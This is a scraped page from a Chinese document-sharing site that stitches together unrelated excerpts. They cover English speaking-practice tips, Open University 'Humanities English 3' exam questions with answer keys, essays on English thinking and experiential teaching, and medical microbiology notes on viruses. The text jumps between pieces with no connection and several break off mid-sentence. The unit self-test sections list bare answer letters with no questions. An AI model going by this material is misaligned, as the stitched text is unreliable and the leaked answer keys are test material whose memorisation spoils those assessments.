单词练习相对简单,但这种方法对于你词汇量的积累是很有帮助的,同时为进一步的练习做准备。 接着,是短句表达的训练。 如果你可以很熟练地直接说出大量的英语词汇,那么就可以进入到第二个步骤,开始着手组织简短的句子。 例如,在听音乐时,可以尝试用英文表达自己的感受,可以从简单的描述开始练习: ?I am listening to music. ?This piece of music is beautiful. ?I like classical music. 又如,观看比赛时,你可以这样表达: ?The match is interesting. ?I think team A will win this match. ?The player number 8 is the best one.

人文英语3 国开开放大学作业答案

第一部分交际用语 阅读下面的小对话,从A、B、C、D四个选项中选出一个能填入空白处的最佳选项,并在答题纸上写出所选的字母符号。 1. —Hello, Sally. How’s everything? — . A. Good for you B. Oh, I agree C. That’s right D. Just so-so 2. — Excuse me, would you lend me your calculator? — . A. Certainly. Here you are B. Please don’t mention it C. It’s nothing D. Yes, I have a hand 3. —I don’t like the spot s programs on Sundays. — . A. So do I B. Neither do I C. So am I D. Neither am I 4. —What’s the problem, Harry? — . A. No problem B. No trouble at all C. Thank you for asking me about it D. I can’t remember where I left my glasses 5. — What kind of TV program do you like best? — .

A. I like them very much B. I only watch them at weekend C. It’s hard to say, actually D. I’m too busy to say 6.-- Could you tell me where Mr. Lake is? -- _________________. A. From England B. At the office C. He’s working D. He’s very busy 7. -- May I help you, madam? -- ______________. A. Sorry, I have no idea B. Yes, I know what to buy C. You’d better give me a hand D. Yes, I’d like 2 kilos of oranges 8.-- Hello, could I speak to Don please? -- ______________? A. Who are you B. What’s the problem C. Are you Jane D. Who’s speaking? 9.--What would you like, tea or coffee? -- _________________. A. Yes, I would B. Coffee, please C. Yes, please D. It’s very nice 10. --What about going for a walk? -- _______________. A. Why not? A good idea B. That’s all right C. So, do I D. Walking is good to you

国开(中央电大)本科《人文英语3》网上形考试题及答案

国开(中央电大)本科《人文英语3》网上形考 试题及答案 单元自测1 形考任务试题及答案 题目为随机,用查找功能(Ctrl+F)搜索题目 题目:—Do you have much experience with caring for babies?—________. 答案:Yes, I do. I often take care of kids in my free time. 题目:Lily is a good student except ________ she is a little bit careless. 答案:that 题目:—How do you feel about your family life?—________. 答案:Not bad. I think it is a good choice to be a full-time mother. 题目:—It' s raining so heavily outside. I' m terribly anxious about my son' s safety.—________. 答案:Don' t worry about him. He will come back safe and sound.

题目:—Ken did badly in his math test. I' m terribly worried about the result.—________. 答案:Come on. It isn' t the end of the world. 题目:—Our son has picked up some bad habits recently, and I am really worried about it.—________. 答案:Cheer up. I believe he will overcome it. 题目:He asked me ___________ Zhang Hua came to school or not. 答案:whether 题目:I want to know________ . 答案:what his name is 题目:It is said that ______ 2000 factories were closed down during the economic crisis. 答案:approximately 题目:The birth rate of the country decreases ______ with years.

关于英语思维能力的培养

关于英语学习中思维能力的培养 Andrew 2012年12月15日更多关于欧洲共同框架语言标准,请参看Wikipedia网站相关文章: 用目标语言为核心技能来思维;以及研究方法 由于语言思维能力是对逻辑、价值和嵌入在目标语言中的沟通方法最直接的理解,所以语言思维能力是把听说读写四个方面能力综合提升的关键。能够发展好这一能力的人可以学习得更快,把学会的内容保持得更久,达到事半功倍的效果,并能把学到的内容立即和不断转化到学校、工作和日常生活的社会、学术成功应用环境中。因此,我们也讨论过,对这一能力的培养应试我们的今后学习中两个重点之一。 另一重点是进行一些美国标准初中和高中英语学科内容的学习,那是作为母语的北美和一些国际学校学生的学习课程。这包括一些书籍的阅读、课上对不同课题的讨论、完成测试、学习测试使用我们新学会的词汇、根据生活相关的题目或阅读的小说诗歌故事课上课程相关的文章等写出总结概括或个人观点。由于孩子们在中学中已有正规的英语课程,他们不需要,也不能另外来上一个完整的课外课程。因此,我建议:我们学习一组有限的课程,实现与他们目前学习的内容有效结合体现多元化的内容和学习方法。 教学法——我们学什么、怎么学

在这一部分中,我想说的是关于思维差异对学习的基础上形成的不同的学习与教学方法,例如体验式教学,这与简单的知识点转移具有很大差别,这已经作为传统长期地应用于全世界学校学习中。 哲学家和学者约翰杜威早在19世纪20年代就提出了学生是根据经验在学习的理论,因为当我们进入教室时我们并不是头脑空白一片的,而是我们之前就已经有了一定数量的经验和教训,知道我们能做什么和应该怎么推进我们的学习进度。而不是假设老师知道的一切,学生什么都不知道,我们可以认识到更多的现实因素,老师也是学生,他们也还在学习,至少他们应该还在继续学习,而学生也不是完全无知,并已经知道很多有用的东西。甚至比这个更重要的是,我们可以问哪种方法可以更好地培养学生,使之适应市场全球化和国际生活:假设有些人生活没有任何含义的利益或问题,直到有些老年人或更聪明的人教会他们一些东西让他们思考;或者一个学生可以根据在教室,学校,教师的帮助下,在大世界中随着知识的增长和学习机会,实现自己的激情、好奇、问题的有机结合。如果我们把学习作为一种通过时间逐步建构意义的过程,那么谁能够比学生自己更能够成为一个完成这个过程更好的主要代理人呢? 所以如果我们遵循建构方法原则,我们可以看到最好的学习将发生在一个半开放式的设置,学生自己的输入与教师输入一样重要,对一个单一的有意义的问题的研究,可以收获比学习数百页的普通课本更丰富的内容。不需要思维的家庭作业会使心灵变得迟钝阴暗,尽管它可能也含有一定的内容,这些内容可以被记住,但是积极的体验式学习不仅充实思想,它还使身体和心灵更好地完美结合。学生在接近一个挑战时,他们将要应用并有效结合所有五种语言技能,使之生产出能表现出更强烈动机的高质量的东西,生产出比那些只需要完成一千个简单的自我练习的人更高质量的东西。 所以按照这一办法,我的课程是基于学习经验设计的,在这一课程中学生首先会问问题,学生提问第一会触发自己的思维和关于科目的知识内容,然后可以试着根据核心技能参与执行必要的语言知识或实际任务。在这种尝试后,我们将返回的技能发展研讨会,学习课程的相关技能,反复练习,再把他们带回体验模

思维方式对英语学习的作用

龙源期刊网 https://www.sodocs.net/doc/0413104873.html, 思维方式对英语学习的作用 作者:雷莉 来源:《校园英语·上旬》2015年第08期 【摘要】英语思维,并非想象中高深莫测、难以企及的目标。英语思维的培养,意为以英语组织语言表达思想时,应适时转换看问题的角度,以期使用纯正地道的英语交流沟通。英语思维,在英语词汇掌握不多的前提下即可表达丰富的内容。 【关键词】英语思维词汇网络表达 一、表达的新路 每个英语学习者都应有意识拓展自己的词汇网络。在这个网络中,词与词之间或多或少都有其相关性。一个结构合理、稳定、激活效率高的词汇网络对于学习者在语言输出时以最快的速度搜索到所需词汇,进而流畅准确的表达大有裨益。 课堂学习、报刊杂志、互联网都是积累词汇的有效途径,但其中有很多冷僻少用的,也有虽常用但只有一、两个词义常用的,更不乏实用性强却鲜有接触的。以上因素是造成学习者词汇网络缺失,或结构失衡,或词汇之间关联性差的原因。布局合理又有张力的词汇网络对更高效率地吸纳新词汇不可或缺。 二、词汇的张力 1.介词。介词在英语中的作用毋庸置疑。一方面,因其使用频率高。另一方面,因其使用范围广。英语在演化、发展的进程中,保留了词汇的空间意义,并充分地扩展到更加广泛的抽象意义。介词作为表达方位的载体,作用之重要不言而喻。介词除了与名词等连用表示方位及与动词搭配构成短语,还有一些用法。 (1)用于人名或人称代词前,表示主语和宾语的关系。 a.I’m behind you.我支持你。 b.You’re still into Annie.你还是对安妮念念不忘。 c.Chemistry was always beyond me.化学对我而言太难了。 (2)用于抽象名词前或具体名词前表示抽象意义。 a.You can reach me at 9055642.你拨9055642就能找到我。

医学微生物学-病毒重点归纳整理

呼吸道病毒

冠状病毒: ①非分节段的单正链RNA ②普通感冒和咽喉炎、严重急性呼吸道综合征 ③无疫苗 肠道病毒 肝炎病毒 肝炎病毒:是引起病毒性肝炎的病原体,这些病毒分别属于不同病毒科,性状显著不同,但均以肝细胞为唯一复制

一、基因结构、功能 HBV的DNA为不完全双链环状DNA 短链——正链(S+) 长链——负链(L-): 【负链为模板,编码病毒蛋白,至少含有4个开放读码框架(ORF)】 ■S区:S基因、PreS1、PreS2基因 →HBsAg、Pre-S1 Ag、Pre-S2 Ag ■C区:前C、C基因 C基因→核心蛋白HBcAg Pre-C与C基因→Pre-C蛋白 Pre-C蛋白经切割加工后形成HBeAg ,入血。 HBeAg为非结构蛋白,一般不出现HBV颗粒 ■P区:→DNA多聚酶。最长。有RNA酶H和逆转录酶活性 ■X区:→HBxAg,可反式激活细胞内的原癌基因及HBV基因, 与肝癌的发生有关。 二、HBV的复制P272 虫媒病毒 虫媒病毒出血热病毒逆转录病毒P306 备注指通过吸血的节肢动物叮咬易感的脊椎动物而 传播疾病的病毒。 ①病毒能在节肢动物体内增殖,并可经卵传 代。因此节肢动物既是病毒的传播媒介,又 是储存宿主。 ②大多数是自然疫源性疾病,也是人畜共患 病。 ③明显的地方性和季节性。 出血热:是一大类疾病的 统称。具有“3H”症状 ①高热(hyperpyrexia) ②出血(hemorrhage) ③低血压(hypotension) 休克及不同脏器的损 害。 含有逆转录酶的RNA病毒流行性乙型脑炎病毒汉坦病毒人类免疫缺陷病毒 生物学性状单正链RNA,20面体,有包膜。单负链RNA,分L、M、S 三个片段。分别编码RNA 聚合酶、包膜糖蛋白G1、 G2和核壳蛋白NP ■刺突 →gp120:病毒的表面糖蛋 白,与病毒吸附有关,有 中和抗原位位点,能刺激 机体产生中和抗体,易发 生变异,有利于病毒逃避 免疫清除。 →gp41:为跨膜蛋白,介 导病毒包膜与宿主细胞膜 的融合。 传染源主要是带毒的家畜和鸟类,如猪、牛、马等。幼 猪是最重要的传染源和中间宿主。新生的幼猪缺 乏免疫力,具有高感染率和高滴度的病毒血症。 蝙蝠亦可。病人血中病毒滴度不高,不是主要传 染源。 多宿主性,主要为啮齿动 物。我国主要是黑线姬鼠 和褐家鼠 HIV感染者和AIDS患者 传播三节吻库蚊是主要的传播媒介 乳鼠是最易感动物。 我国是乙脑主要流行区。流行季节与蚊子密度的 高峰期一致。 尚未完全明确①性传播:是HIV的主要 传播方式。 ②血液传播:静脉毒品成 瘾者是高危人群。 ③母婴传播:胎儿经胎盘 感染最多见。

谈谈培养英语思维方式

谈谈培养英语思维方式 我们常常听到要把英语学精,通过各种途径来提高英语水平,养成英语思维方式。什么是英语思维方式?怎样去培养?优越论文网老师在此温馨指导。 简单来说,英语思维方式就是阅读英文时,学会用英语想问你,不是曲折地将英语翻译成汉语,用汉语的思维想问题,做题目。 首先要知道英语和汉语思维方式的不同: 1、英语重结构,汉语重语义; 2、英语多长句,汉语多短句; 3、英语多从句,汉语多分句; 4、英语多代词,汉语多名词; 5、英语多被动,汉语多主动; 6、英语多变化,汉语多重复; 7、英语多抽象,汉语多具体…… 具体事例就不列举了,学生在长期接触英语中可以感受到两种语言的重大差别。要想培养英语思维,争取在听说读写四个方面都做到,培养纯本土英语学习与运用。 国外留学,英语很重要,英语不好导致交流不方便,课程学习困难,写论文更是在杀脑细胞。要怎样才能成功培养这种思维呢? 1、准备好材料。准备好各种学习材料,听力和口语方面的,尽量将文本的英语内化为自己思维中的英语。比如新概念英语、美国文化背景、人类的故事、美国总统辩论、VOA、狮子王、老友记等。 2、大量读背,培养语感。大量地阅读英文书籍,也包括报刊杂志等,对于经典的篇目(包括课程内容)可以反复朗读并且背诵,不断地将自己读背的与磁带或是网上听力作对比,自己不好的地方要及时改正过来。 3、多说多练。抓住一切机会与以英语为母语的人交流,可以多出门旅游,或者多交一些外国朋友,大胆地用英语对话。同事,在对话的过程中注意一些当地的文化。 4、自我双向交流。通过自己的imagination(想象力)来创造,利用学过的英语文章,找出话题或问题,通过自我问答法,侃侃而谈,设想自己处于一个双向交流通道(tow-way communication channels)中,与一位假想的交流者练习。

微生物学各章重点

绪论.ppt 1.微生物的分类及原核细胞型与真核细胞型的区别? 2.近年微生物学得到了迅速地发展,主要表现在哪些方面? 3.医学微生物学未来发展方向是什么? 第01章细菌的形态与结构.ppt 1.细菌有哪3种形态? 2.细菌的基本结构和特殊结构有哪些?特殊结构各有何作用? 3.G+菌和G-菌细胞壁的结构由哪几部分组成? 4.青霉素和溶菌酶为什么不能杀灭革兰阴性菌? 5.简述革兰染色法操作步骤 第02章细菌的生理.ppt 1.细菌的生长繁殖条件是什么? 2.细菌生长曲线分哪4个阶段? 3.细菌根据对氧的需要程度分为哪几种类型? 4.细菌合成代谢产物有哪几种? 第03章消毒灭菌与病原微生物实验室生物安全.ppt 1.常用的消毒剂有哪些种类? 2.简述化学消毒剂的杀菌机制。 3.湿热灭菌有哪些方法? 各有何用途? 4.筒述紫外线杀菌的作用机制和注意事项。 5.在温度和时间相同的情况下,为什么湿热灭菌法的效果比干热法好? 6.当从事病原生物学安全实验室工作时,应考虑哪些与生物安全相关的问题?第04章噬菌体.ppt 1.噬菌体的概念及其特征。 2.毒性噬菌体和温和噬菌体、前噬菌体、溶原性细菌、溶原性转换的概念及特征。 3.溶菌性周期与溶原性周期的区别。 第05章细菌的遗传变异.ppt 1.细菌基因转移和重组的类型及其主要差异? 2.何谓BCG、transposon、R质粒、Hfr、lysogenic conversion和Ames试验? 3.影印试验验证何种理论?突变型细菌有哪些? 第06章细菌耐药性.ppt 1.简述抗菌药物类型 2.抗菌药物作用机制又几种? 3.简述细菌耐药性产生机制。 4.控制细菌耐药性策略? 第07章细菌的感染与免疫.ppt 1.病原菌对宿主的致病性,是由哪些因素决定的? 2.试比较内毒素与外毒素的基本生物学特性? 3.细菌的侵袭力,由哪些因素组成? 4.请陈述机体抗细菌感染的特点? 5.当机体感染病原菌后,感染的发展及其结果可能在机体有哪些方面的表现? 6.试述医院感染的基本特点?从医学微生物学角度,怎样预防和控制医院感染?第08章细菌感染的检查方法与防治原则.ppt 1. 试述检测病原菌的基本程序和原则?

培养英文思维的八大神技

培养英文思维的八大神技 本篇分享来自有10年教龄的原新东方优秀讲师、坚小持微课创始人Laurence. 很多人有一个误区,认为英语思维就是像老外一样思考。 其实不然,英语思维是英语流利的前提,重要性其实比词汇、发音、语法等有过之而无不及。只是思维这个东西很虚幻,可以被感知到,但看不见摸不着,也很难教,所以市面上也少有老师讲英文思维的训练方法。 首先要意识到,老外在相同情况下,跟咱们想问题是不同的。 举例来说:中国人说一个人强壮,说他壮如牛,老外说as strong as a horse. 他们想到的不是牛,想到的是马。 再比如,中国人说往自己脸上贴金,想到的是把“金子”,老外想到的是toot his horn,吹响他的喇叭,我们想金子,他们想喇叭,差距太大了吧! 当然也有例外,比如一石二鸟,英语就是kill two birds with one stone. 有异曲同工之妙。不过大部分情况下,中国人跟老外的思维方式是不同的,面对相同的情景,二者想到的点事也很不一样。我们没有必要要向他们一样去想问题。 什么是英文思维? Think in English.用英语思考,换句话就说叫,Don’t think in Chinese不要用中文思考,再直白了讲,就是不要翻译。英文定义是: “Thinking in English” is the ability to SPEAK, READ, WRITE in English and LISTEN to English without any involvement of your native language. 为什么不要在处理英文的时候翻译? 第一,翻译减慢理解和表达速度慢 真实环境中没有那么多时间,让你中英文翻来翻去。 第二,翻译产生Chinglish

208国开网人文英语3答案(单元自测2~8)

单元自测 2 题目为随机,用查找功能(Ctrl+F)搜索题目 二、阅读短文 子问题1:A; 子问题2:B; 子问题3:B; 子问题4:A; 子问题5:C 单元自测3 题目为随机,用查找功能(Ctrl+F)搜索题目 二、阅读理解:选择题 子问题1:C; 子问题2:C; 子问题3:A; 子问题4:B; 子问题5:B 二、阅读理解:正误判断

子问题1:F; 子问题2:T; 子问题3:T; 子问题4:F; 子问题5:F 单元自测4 题目为随机,用查找功能(Ctrl+F)搜索题目 二、英译汉 子问题1:B; 子问题2:A; 子问题3:C; 子问题4:B; 子问题5:B 二、阅读理解:正误判断 子问题1:F; 子问题2:F; 子问题3:T; 子问题4:T; 子问题5:T 单元自测5 题目为随机,用查找功能(Ctrl+F)搜索题目

二、翻译 子问题1:B; 子问题2:C; 子问题3:A; 子问题4:C; 子问题5:A 单元自测6 题目为随机,用查找功能(Ctrl+F)搜索题目 二、阅读理解:选择题 子问题1:D; 子问题2:B; 子问题3:E; 子问题4:A; 子问题5:C

二、阅读理解:正误判断 子问题1:F; 子问题2:F; 子问题3:F; 子问题4:T; 子问题5:F 单元自测7 题目为随机,用查找功能(Ctrl+F)搜索题目 二、阅读理解:判断题 子问题1:F; 子问题2:F; 子问题3:T; 子问题4:T; 子问题5:F 二、阅读理解:选择题 子问题1:A; 子问题2:C; 子问题3:B; 子问题4:A; 子问题5:C 单元自测8 题目为随机,用查找功能(Ctrl+F)搜索题目

2021年国开网人文英语3答案(单元自测2~8)

单元自测2 欧阳光明(2021.03.07) 二、阅读短文 子问题 1:A; 子问题 2:B; 子问题 3:B; 子问题 4:A; 子问题 5:C 单元自测3 二、阅读理解:选择题 子问题 1:C; 子问题 2:C; 子问题 3:A; 子问题 4:B; 子问题 5:B 二、阅读理解:正误判断 子问题 1:F; 子问题 2:T; 子问题 3:T; 子问题 4:F; 子问题 5:F 单元自测4 题目为随机,用查找功能(Ctrl+F)搜索题目

二、英译汉 子问题 1:B; 子问题 2:A; 子问题 3:C; 子问题 4:B; 子问题 5:B 二、阅读理解:正误判断 子问题 1:F; 子问题 2:F; 子问题 3:T; 子问题 4:T; 子问题 5:T 单元自测5 二、翻译 子问题 1:B; 子问题 2:C; 子问题 3:A; 子问题 4:C; 子问题 5:A

单元自测6 二、阅读理解:选择题 子问题 1:D; 子问题 2:B; 子问题 3:E; 子问题 4:A; 子问题 5:C 二、阅读理解:正误判断 子问题 1:F; 子问题 2:F; 子问题 3:F; 子问题 4:T; 子问题 5:F 单元自测7 二、阅读理解:判断题 子问题 1:F; 子问题 2:F; 子问题 3:T; 子问题 4:T; 子问题 5:F

二、阅读理解:选择题 子问题 1:A; 子问题 2:C; 子问题 3:B; 子问题 4:A; 子问题 5:C 单元自测8 二、阅读理解:判断正误 子问题 1:F; 子问题 2:T; 子问题 3:F; 子问题 4:T; 子问题 5:T

相关主题

相关文档

最新文档

© 2013-2022 www.sodocs.net  站点地图 | 侵权投诉

闽ICP备11023808号-8  本站资源均为网友上传分享,本站仅负责收集和整理,有任何问题请在对应网页下方投诉通道反馈